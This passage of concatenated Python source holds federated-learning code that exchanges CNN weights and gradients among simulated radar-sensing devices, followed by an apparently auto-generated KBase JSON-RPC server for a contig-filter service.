np.squeeze(np.asarray(mathcontent['biases1'])) W_up_l2 = np.asarray(mathcontent['weights2']) n_up_l2 = np.squeeze(np.asarray(mathcontent['biases2'])) except: pause(5) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) W_up_l1 = np.asarray(mathcontent['weights1']) n_up_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_l2 = np.asarray(mathcontent['weights2']) n_up_l2 = np.squeeze(np.asarray(mathcontent['biases2'])) # update local model with neighbor gradients for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)): pause(1) try: mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) except: pause(3) mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) gradW_up_neigh_l1 = np.asarray(mathcontent['grad_weights1']) gradW_up_neigh_l2 = np.asarray(mathcontent['grad_weights2']) try: gradn_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['grad_biases1'])) gradn_up_neigh_l2 = np.squeeze(np.asarray(mathcontent['grad_biases2'])) except: pause(5) print('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) del mathcontent mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) gradW_up_neigh_l1 = np.asarray(mathcontent['grad_weights1']) gradW_up_neigh_l2 = np.asarray(mathcontent['grad_weights2']) gradn_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['grad_biases1'])) gradn_up_neigh_l2 = np.squeeze(np.asarray(mathcontent['grad_biases2'])) # MEWMA UPDATE mewma = args.ro # saving gradients if epoch == 1: W_l1_saved[:, :, :, neighbor_index] = gradW_up_neigh_l1[:, :, :, ii_saved_local] W_l2_saved[:, :, neighbor_index] = gradW_up_neigh_l2[:, :, ii_saved_local] n_l1_saved[:, neighbor_index] = gradn_up_neigh_l1[:, ii_saved_local] n_l2_saved[:, neighbor_index] = gradn_up_neigh_l2[:, ii_saved_local] else: W_l1_saved[:, :, :, neighbor_index] = mewma * gradW_up_neigh_l1[:, :, :, ii_saved_local] + (1 - mewma) * W_l1_saved[:, :, :, neighbor_index] W_l2_saved[:, :, neighbor_index] = mewma * gradW_up_neigh_l2[:, :, ii_saved_local] + (1 - mewma) * W_l2_saved[:, :, neighbor_index] n_l1_saved[:, neighbor_index] = mewma * gradn_up_neigh_l1[:, ii_saved_local] + (1 - mewma) * n_l1_saved[:, neighbor_index] n_l2_saved[:, neighbor_index] = mewma * gradn_up_neigh_l2[:, ii_saved_local] + (1 - mewma) * n_l2_saved[:, neighbor_index] W_up_l1 = W_up_l1 - learning_rate1 * gradW_up_neigh_l1[:, :, :, ii_saved_local] n_up_l1 = n_up_l1 - learning_rate1 * gradn_up_neigh_l1[:, ii_saved_local] W_up_l2 = W_up_l2 - learning_rate2 * gradW_up_neigh_l2[:, :, ii_saved_local] n_up_l2 = n_up_l2 - learning_rate2 * gradn_up_neigh_l2[:, ii_saved_local] else: W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 else: W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 return W_up_l1, n_up_l1, W_up_l2, n_up_l2, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved # CFA - GE: 2 stage (or fast) negotiation def getFederatedWeight_gradients_fast(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, devices, ii_saved_local, epoch, v_loss,eng, x_train2, y_train2, neighbors, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved): x_c = tf.placeholder(tf.float32, [None, 512]) # 512 point FFT range measurements y_c = tf.placeholder(tf.float32, [None, 8]) # 0-7 HR distances => 8 classes W_ext_c_l1 = tf.placeholder(tf.float32, [filter, 1, number]) b_ext_c_l1 = tf.placeholder(tf.float32, [number]) W_ext_c_l2 = tf.placeholder(tf.float32, [multip*number, 8]) b_ext_c_l2 = tf.placeholder(tf.float32, [8]) # Construct model Layer #1 CNN 1d, Layer #2 FC hidden1 = conv1d(x_c, W_ext_c_l1, b_ext_c_l1) hidden1 = tf.layers.max_pooling1d(hidden1, pool_size=stride, strides=stride, padding='SAME') fc1 = tf.reshape(hidden1, [-1, multip * number]) pred_c = tf.nn.softmax(tf.matmul(fc1, W_ext_c_l2) + b_ext_c_l2) # example 2 layers # Minimize error using cross entropy cost_c = tf.reduce_mean(-tf.reduce_sum(y_c * tf.log(tf.clip_by_value(pred_c, 1e-15, 0.99)), reduction_indices=1)) # obtain the gradients for each layer grad_W_c_l1, grad_b_c_l1, grad_W_c_l2, grad_b_c_l2 = tf.gradients(xs=[W_ext_c_l1, b_ext_c_l1, W_ext_c_l2, b_ext_c_l2], ys=cost_c) # Initialize the variables (i.e. assign their default value) init_c = tf.global_variables_initializer() if (federated): if devices > 1: if epoch == 0: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 else: sio.savemat('temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) neighbor_vec = get_connectivity(ii_saved_local, neighbors, devices) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) or not os.path.isfile( 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch - 1)) pause(1) [W_up_l1, n_up_l1, W_up_l2, n_up_l2] = federated_weights_computing2( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1), 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), ii_saved_local, neighbor_vec[neighbor_index], epoch, devices, neighbors) pause(5) W_up_l1 = np.asarray(W_up_l1) n_up_l1 = np.squeeze(np.asarray(n_up_l1)) W_up_l2 = np.asarray(W_up_l2) n_up_l2 = np.squeeze(np.asarray(n_up_l2)) pause(3) try: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2}) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) except: print('Unable to save file .. retrying') pause(3) sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2}) g_W_c_vect_l1 = np.zeros([filter, 1, number, devices]) g_b_c_vect_l1 = np.zeros([number, devices]) g_W_c_vect_l2 = np.zeros([multip * number, 8, devices]) g_b_c_vect_l2 = np.zeros([8, devices]) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch)) pause(1) try: mathcontent = sio.loadmat('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) W_up_neigh_l1 = np.asarray(mathcontent['weights1']) n_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_neigh_l2 = np.asarray(mathcontent['weights2']) n_up_neigh_l2 = np.squeeze(np.array(mathcontent['biases2'])) except: pause(5) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) W_up_neigh_l1 = np.asarray(mathcontent['weights1']) n_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_neigh_l2 = np.asarray(mathcontent['weights2']) n_up_neigh_l2 = np.squeeze(np.array(mathcontent['biases2'])) with tf.Session() as sess3: sess3.run(init_c) g_W_c_l1, g_b_c_l1, g_W_c_l2, g_b_c_l2 = sess3.run( [grad_W_c_l1, grad_b_c_l1, grad_W_c_l2, grad_b_c_l2], feed_dict={x_c: x_train2, y_c: y_train2, W_ext_c_l1: W_up_neigh_l1, b_ext_c_l1: n_up_neigh_l1, W_ext_c_l2: W_up_neigh_l2, b_ext_c_l2: n_up_neigh_l2}) g_W_c_vect_l1[:, :, :, neighbor_vec[neighbor_index]] = g_W_c_l1 g_b_c_vect_l1[:, neighbor_vec[neighbor_index]] = g_b_c_l1 g_W_c_vect_l2[:, :, neighbor_vec[neighbor_index]] = g_W_c_l2 g_b_c_vect_l2[:, neighbor_vec[neighbor_index]] = g_b_c_l2 # save gradients and upload try: sio.savemat('datagrad{}_{}.mat'.format(ii_saved_local, epoch), { "grad_weights1": g_W_c_vect_l1, "grad_biases1": g_b_c_vect_l1, "grad_weights2": g_W_c_vect_l2, "grad_biases2": g_b_c_vect_l2, "epoch": epoch}) # waiting for other gradient updates pause(5) mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(ii_saved_local, epoch)) test_var = mathcontent['grad_biases1'] del mathcontent except: print('Unable to save file .. retrying') pause(3) sio.savemat('datagrad{}_{}.mat'.format(ii_saved_local, epoch), { "grad_weights1": g_W_c_vect_l1, "grad_biases1": g_b_c_vect_l1, "grad_weights2": g_W_c_vect_l2, "grad_biases2": g_b_c_vect_l2, "epoch": epoch}) # free space (cache files) if epoch >= 9: fileList_grad = glob.glob('datagrad{}_{}.mat'.format(ii_saved_local, epoch-8), recursive=False) for filePath in fileList_grad: try: os.remove(filePath) # Garbage collector active (removing unused cache files) except OSError: print("Error while deleting file") # waiting for other gradient updates pause(5) # update local model with neighbor gradients for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)): pause(1) try: mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) except: pause(3) mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) gradW_up_neigh_l1 = np.asarray(mathcontent['grad_weights1']) gradW_up_neigh_l2 = np.asarray(mathcontent['grad_weights2']) try: gradn_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['grad_biases1'])) gradn_up_neigh_l2 = np.squeeze(np.asarray(mathcontent['grad_biases2'])) except: pause(5) print('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch)) del mathcontent mathcontent = sio.loadmat('datagrad{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) gradW_up_neigh_l1 = np.asarray(mathcontent['grad_weights1']) gradW_up_neigh_l2 = np.asarray(mathcontent['grad_weights2']) gradn_up_neigh_l1 = np.squeeze(np.asarray(mathcontent['grad_biases1'])) gradn_up_neigh_l2 = np.squeeze(np.asarray(mathcontent['grad_biases2'])) # MEWMA UPDATE mewma = args.ro # saving gradients W_l1_saved[:, :, :, neighbor_index] = mewma * gradW_up_neigh_l1[:, :, :, ii_saved_local] + (1 - mewma) * W_l1_saved[:, :, :, neighbor_index] W_l2_saved[:, :, neighbor_index] = mewma * gradW_up_neigh_l2[:, :, ii_saved_local] + (1 - mewma) * W_l2_saved[:, :, neighbor_index] n_l1_saved[:, neighbor_index] = mewma * gradn_up_neigh_l1[:, ii_saved_local] + (1 - mewma) * n_l1_saved[:, neighbor_index] n_l2_saved[:, neighbor_index] = mewma * gradn_up_neigh_l2[:, ii_saved_local] + (1 - mewma) * n_l2_saved[:, neighbor_index] W_up_l1 = W_up_l1 - learning_rate1 * W_l1_saved[:, :, :, neighbor_index] n_up_l1 = n_up_l1 - learning_rate1 * n_l1_saved[:, neighbor_index] W_up_l2 = W_up_l2 - learning_rate2 * W_l2_saved[:, :, neighbor_index] n_up_l2 = n_up_l2 - learning_rate2 * n_l2_saved[:, neighbor_index] else: W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 else: W_up_l1 = n_W_l1 W_up_l2 = n_W_l2 n_up_l1 = n_b_l1 n_up_l2 = n_b_l2 return W_up_l1, n_up_l1, W_up_l2, n_up_l2, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved # CFA def getFederatedWeight(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, devices, ii_saved_local, epoch, v_loss,eng, neighbors): if (federated): if devices > 1: # multihop topology if epoch == 0: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) W_up_l1 = n_W_l1 n_up_l1 = n_b_l1 W_up_l2 = n_W_l2 n_up_l2 = n_b_l2 else: sio.savemat('temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2, "epoch": epoch, "loss_sample": v_loss}) # neighbor_vec = [ii_saved_local - 1, ii_saved_local + 1] neighbor_vec = get_connectivity(ii_saved_local, neighbors, devices) for neighbor_index in range(neighbor_vec.size): while not os.path.isfile( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1)) or not os.path.isfile( 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch)): # print('Waiting for datamat{}_{}.mat'.format(ii_saved_local - 1, epoch - 1)) pause(1) [W_up_l1, n_up_l1, W_up_l2, n_up_l2] = federated_weights_computing2( 'datamat{}_{}.mat'.format(neighbor_vec[neighbor_index], epoch - 1), 'temp_datamat{}_{}.mat'.format(ii_saved_local, epoch), ii_saved_local, neighbor_vec[neighbor_index], epoch, devices, neighbors) pause(5) try: sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2}) mathcontent = sio.loadmat('datamat{}_{}.mat'.format(ii_saved_local, epoch)) except: print('Unable to save file .. retrying') pause(3) sio.savemat('datamat{}_{}.mat'.format(ii_saved_local, epoch), { "weights1": n_W_l1, "biases1": n_b_l1, "weights2": n_W_l2, "biases2": n_b_l2}) W_up_l1 = np.asarray(mathcontent['weights1']) n_up_l1 = np.squeeze(np.asarray(mathcontent['biases1'])) W_up_l2 = np.asarray(mathcontent['weights2']) n_up_l2 = np.squeeze(np.asarray(mathcontent['biases2'])) else: W_up_l1 = n_W_l1 n_up_l1 = n_b_l1 W_up_l2 = n_W_l2 n_up_l2 = n_b_l2 return W_up_l1, n_up_l1, W_up_l2, n_up_l2 def processData(samples, iii, federated, tot_devices,fraction_training, neighbors_number,EPOCH_THRESHOLD): # eng = matlab.engine.start_matlab() eng = 0 global learning_rate learning_rate_local = learning_rate np.random.seed(1) tf.set_random_seed(1) # common initialization # mnist = input_data.read_data_sets("/tmp/data/", one_hot=True) # MNIST DATABASE USED AS AN ALTERNATIVE # mnist2 = input_data.read_data_sets("/tmp/data/", one_hot=True) database = sio.loadmat('dati_radar_05-07-2019/data_base_all_sequences_random.mat') x_train = database['Data_train_2'] y_train = database['label_train_2'] y_train_t = to_categorical(y_train) x_train = (x_train.astype('float32') + 140) / 140 # DATA PREPARATION (NORMALIZATION AND SCALING OF FFT MEASUREMENTS) x_train2 = x_train[iii * samples:((iii + 1) * samples - 1), :] # DATA PARTITION y_train2 = y_train_t[iii * samples:((iii + 1) * samples - 1),:] x_test = database['Data_test_2'] y_test = database['label_test_2'] x_test = (x_test.astype('float32') + 140) / 140 y_test_t = to_categorical(y_test) total_batch2 = int(fraction_training / batch_size) # tf Graph Input x = tf.placeholder(tf.float32, [None, 512]) # 512 POINT FFT RANGE MEASUREMENTS y = tf.placeholder(tf.float32, [None, 8]) # 0-7 HR distances (safe - unsafe) W_ext_l1 = tf.placeholder(tf.float32, [filter, 1, number]) b_ext_l1 = tf.placeholder(tf.float32, [number]) W_ext_l2 = tf.placeholder(tf.float32, [multip * number, 8]) b_ext_l2 = tf.placeholder(tf.float32, [8]) W2_ext_l1 = tf.placeholder(tf.float32, [filter, 1, number]) b2_ext_l1 = tf.placeholder(tf.float32, [number]) W2_ext_l2 = tf.placeholder(tf.float32, [multip * number, 8]) b2_ext_l2 = tf.placeholder(tf.float32, [8]) # Set model weights W_l1 = tf.Variable(tf.random_normal([filter, 1, number])) b_l1 = tf.Variable(tf.random_normal([number])) W_l2 = tf.Variable(tf.zeros([multip * number, 8])) b_l2 = tf.Variable(tf.zeros([8])) # Construct model Layer #1 CNN 1d, Layer #2 FC hidden0 = conv1d(x, W_ext_l1, b_ext_l1) hidden01 = tf.layers.max_pooling1d(hidden0, pool_size=stride, strides=stride, padding='SAME') fc01 = tf.reshape(hidden01, [-1, multip*number]) pred = tf.nn.softmax(tf.matmul(fc01, W_ext_l2) + b_ext_l2) # example 2 layers hidden2 = conv1d(x, W2_ext_l1, b2_ext_l1) hidden02 = tf.layers.max_pooling1d(hidden2, pool_size=stride, strides=stride, padding='SAME') fc02 = tf.reshape(hidden02, [-1, multip*number]) pred2 = tf.nn.softmax(tf.matmul(fc02, W2_ext_l2) + b2_ext_l2) # example 2 layers # Minimize error using cross entropy cost = tf.reduce_mean(-tf.reduce_sum(y * tf.log(tf.clip_by_value(pred, 1e-15, 0.99)), reduction_indices=1)) cost2 = tf.reduce_mean(-tf.reduce_sum(y * tf.log(tf.clip_by_value(pred2, 1e-15, 0.99)), reduction_indices=1)) #gradients per layer grad_W_l1, grad_b_l1, grad_W_l2, grad_b_l2 = tf.gradients(xs=[W_ext_l1, b_ext_l1, W_ext_l2, b_ext_l2], ys=cost) new_W_l1 = W_l1.assign(W_ext_l1 - learning_rate * grad_W_l1) new_b_l1 = b_l1.assign(b_ext_l1 - learning_rate * grad_b_l1) new_W_l2 = W_l2.assign(W_ext_l2 - learning_rate * grad_W_l2) new_b_l2 = b_l2.assign(b_ext_l2 - learning_rate * grad_b_l2) # Initialize the variables (i.e. assign their default value) init = tf.global_variables_initializer() # Start training with tf.Session() as sess: sess.run(init) total_batch = int(samples / batch_size) # PRINTS THE TOTAL NUMBER OF MINI BATCHES print(total_batch) # Training cycle val_loss = np.zeros(training_epochs) for epoch in range(training_epochs): avg_cost = 0. avg_cost_test = 0. for i in range(total_batch): batch_xs = x_train2[i * batch_size:((i + 1) * batch_size - 1), :] batch_ys = y_train2[i * batch_size:((i + 1) * batch_size - 1), :] if (i == 0) and (epoch == 0): # initialization # W_val_l1 = np.zeros([512, 32]) W_val_l1 = np.random.normal(0.0, 1.0, (filter, 1, number)) # b_val_l1 = np.zeros([32]) b_val_l1 = np.random.normal(0.0, 1.0, number) W_val_l2 = np.zeros([multip*number, 8]) b_val_l2 = np.zeros([8]) elif (i > 0): W_val_l1 = n_W_l1 # modify for minibatch updates b_val_l1 = n_b_l1 W_val_l2 = n_W_l2 # modify for minibatch updates b_val_l2 = n_b_l2 # Fit training using batch data n_W_l1, n_b_l1, n_W_l2, n_b_l2, c, g_W_l1, g_b_l1, g_W_l2, g_b_l2 = sess.run([new_W_l1, new_b_l1, new_W_l2, new_b_l2, cost, grad_W_l1, grad_b_l1, grad_W_l2, grad_b_l2], feed_dict={x: batch_xs, y: batch_ys, W_ext_l1: W_val_l1, b_ext_l1: b_val_l1, W_ext_l2: W_val_l2, b_ext_l2: b_val_l2}) avg_cost += c / total_batch # Training loss # validation with tf.Session() as sess2: sess2.run(init) for i in range(total_batch2): # Construct model batch_xs = x_test[i * batch_size:((i + 1) * batch_size - 1), :] batch_ys = y_test_t[i * batch_size:((i + 1) * batch_size - 1), :] c = sess2.run(cost2, feed_dict={x: batch_xs, y: batch_ys, W2_ext_l1: n_W_l1, b2_ext_l1: n_b_l1, W2_ext_l2: n_W_l2, b2_ext_l2: n_b_l2}) avg_cost_test += c / total_batch2 val_loss[epoch] = avg_cost_test print('Test Device: ' + str(iii) + " Epoch:", '%04d' % (epoch + 1), "cost=", "{:.9f}".format(avg_cost_test)) ########################################################### # CFA: weights exchange (no gradients) # COMMENT BELOW IF CFA IS SELECTED # W_val_l1, b_val_l1, W_val_l2, b_val_l2 = getFederatedWeight(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, tot_devices, iii, epoch, val_loss, eng, neighbors_number) ################################################## ################################################### # CFA - GE: 2-stage negotiation after epoch EPOCH_THRESHOLD # COMMENT BELOW IF CFA IS SELECTED if epoch < EPOCH_THRESHOLD: if epoch < 2: W_l1_saved = np.zeros((filter, 1, number, neighbors_number)) W_l2_saved = np.zeros((multip * number, 8, neighbors_number)) n_l1_saved = np.zeros((number, neighbors_number)) n_l2_saved = np.zeros((8, neighbors_number)) W_val_l1, b_val_l1, W_val_l2, b_val_l2, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved = getFederatedWeight_gradients(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, tot_devices, iii, epoch, val_loss, eng, x_train2, y_train2, neighbors_number, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved) # method with gradients exchange else: W_val_l1, b_val_l1, W_val_l2, b_val_l2, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved = getFederatedWeight_gradients_fast(n_W_l1, n_W_l2, n_b_l1, n_b_l2, federated, tot_devices, iii, epoch, val_loss, eng, x_train2, y_train2, neighbors_number, W_l1_saved, W_l2_saved, n_l1_saved, n_l2_saved) # method with gradients exchange ########################################################### print("Optimization Finished!") # DUMP RESULTS sio.savemat( 'results/dump_loss_{}_{date:%Y-%m-%d-%H-%M-%S}.mat'.format(iii, date=datetime.datetime.now().time()), { "val_acc": val_loss, "device": iii}) # Test model # correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1)) # Calculate accuracy for 3000 examples # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) if __name__ == "__main__": # DELETE TEMPORARY CACHE FILES fileList = glob.glob('*.mat', recursive=False) print(fileList) for filePath in fileList: try: os.remove(filePath) except OSError: print("Error while deleting file") ##################### SETS SIMULATION PARAMETERS ############################### devices = args.K # NUMBER OF DE VICES neighbors_number = args.N # NUMBER OF NEIGHBORS PER DEVICE (K-DEGREE NETWORK) ii_saved = 0 EPOCH_THRESHOLD = 4 # STARTING EPOCH FOR CFA-GE (2-STAGE NEGOTIATION) federated = True # ENABLE FEDERATED LEARNING) training_set_per_device = 25 # NUMBER OF TRAINING SAMPLES PER DEVICE fraction_training = int(devices*training_set_per_device) # total training b_v = 1/devices balancing_vect = np.ones(devices)*b_v samples = np.zeros(devices) # training samples per device validation_train = 16000 # VALIDATION DATASET ################################################################################### # START MULTIPROCESSING for id in range(devices): samples[id] = math.floor(balancing_vect[id]*fraction_training) # samples = int(fraction_training/devices) # training samples per device print(samples) t = [] iii = 0 for ii in range(devices): t.append(multiprocessing.Process(target=processData, args=(int(samples[ii]), ii, federated, devices, validation_train, neighbors_number, EPOCH_THRESHOLD))) t[ii].start() exit(0)
jayrboltonContigFilterServer.py
#!/usr/bin/env python # -*- coding: utf-8 -*- from wsgiref.simple_server import make_server import sys import json import traceback import datetime from multiprocessing import Process from getopt import getopt, GetoptError from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\ JSONRPCError, InvalidRequestError from jsonrpcbase import ServerError as JSONServerError from os import environ from ConfigParser import ConfigParser from biokbase import log import requests as _requests import random as _random import os from jayrboltonContigFilter.authclient import KBaseAuth as _KBaseAuth DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' AUTH = 'auth-service-url' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'jayrboltonContigFilter'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from jayrboltonContigFilter.jayrboltonContigFilterImpl import jayrboltonContigFilter # noqa @IgnorePep8 impl_jayrboltonContigFilter = jayrboltonContigFilter(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = JSONServerError() newerr.trace = traceback.format_exc() if isinstance(e.message, basestring): newerr.data = e.message else: # Some exceptions embed other exceptions as the message newerr.data = repr(e.message) raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. """ rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8 self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self['provenance'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def provenance(self): callbackURL = os.environ.get('SDK_CALLBACK_URL') if callbackURL: # OK, there's a callback server from which we can get provenance arg_hash = {'method': 'CallbackServer.get_provenance', 'params': [], 'version': '1.1', 'id': str(_random.random())[2:] } body = json.dumps(arg_hash) response = _requests.post(callbackURL, data=body, timeout=60) response.encoding = 'utf-8' if response.status_code == 500: if ('content-type' in response.headers and response.headers['content-type'] == 'application/json'): err = response.json() if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, response.text) else: raise ServerError('Unknown', 0, response.text) if not response.ok: response.raise_for_status() resp = response.json() if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'][0] else: return self.get('provenance') class ServerError(Exception): ''' The call returned an error. Fields: name - the name of the error. code - the error code. message - a human readable error message. data - the server side stacktrace. ''' def __init__(self, name, code, message, data=None, error=None): super(Exception, self).__init__(message) self.name = name self.code = code self.message = message if message else '' self.data = data or error or '' # data = JSON RPC 2.0, error = 1.1 def __str__(self): return self.name + ': ' + str(self.code) + '. ' + self.message + \ '\n' + self.data def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'jayrboltonContigFilter' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_jayrboltonContigFilter.filter_contigs, name='jayrboltonContigFilter.filter_contigs', types=[basestring, dict]) 